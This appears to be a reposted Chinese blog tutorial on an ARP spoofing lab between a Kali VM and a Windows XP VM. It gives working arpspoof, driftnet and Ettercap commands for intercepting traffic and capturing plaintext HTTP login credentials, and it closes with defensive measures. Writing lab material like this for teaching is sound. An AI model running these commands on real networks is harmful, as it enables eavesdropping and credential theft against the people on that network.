ARP欺骗

ARP欺骗实验

0x00 arp欺骗原理
   在每台主机都有一个ARP缓存表，缓存表中记录了IP地址与MAC地址的对应关系，而局域网数据传输依靠的是MAC地址。
  ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

0x01 虚拟实验环境准备
  攻击机：kali_2020_linux ip: 192.168.64.129
  受害机：winXP     ip: 192.168.64.132

0x02 arp欺骗实施过程

1、配置数据包转发
  echo 1 >/proc/sys/net/ipv4/ip_forward

2、使用arpspoof进行arp劫持
arpspoof -i 网卡名称 -t 目标ip 目标网关
在此环境中使用以下命令：
arpspoof -i eth0 -t 192.168.64.132 192.168.64.2
![使用arpspoof劫持](https://www.icode9.com/i/ll/?i=2021013116191849.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg4NTM1NQ==,size_16,color_FFFFFF,t_70
没有arpspoof的：

apt-get install dsniff

3、对攻击机网卡进行监听
  driftnet -i eth0
没有该工具的：

apt-get install driftnet

就可以啦

4、受害机浏览图片
5、攻击机截取到图片
只能抓到http协议网页的图片信息

6、获取受害机网页登陆用户名和密码
  Ettercap -Tq -i eth0
7、靶机找一个http页面的登录框，随便登陆
 这里使用，用户名：WCC 密码：123456789
点击登陆

8、攻击机获取到http通过明文传输的用户名和密码
0x03 漏洞防御
  1、处理ARP欺骗攻击最一般的方法就是IP-MAC绑定，可以在客户端主机和网关路由器上双向绑定IP-MAC来避免ARP欺骗导致无法上网。

  2、使用ARP防火墙，自动抵御ARP欺骗和ARP攻击

标签：ARP,ip,192.168,MAC,欺骗,arpspoof
来源： https://blog.csdn.net/weixin_43885355/article/details/113477425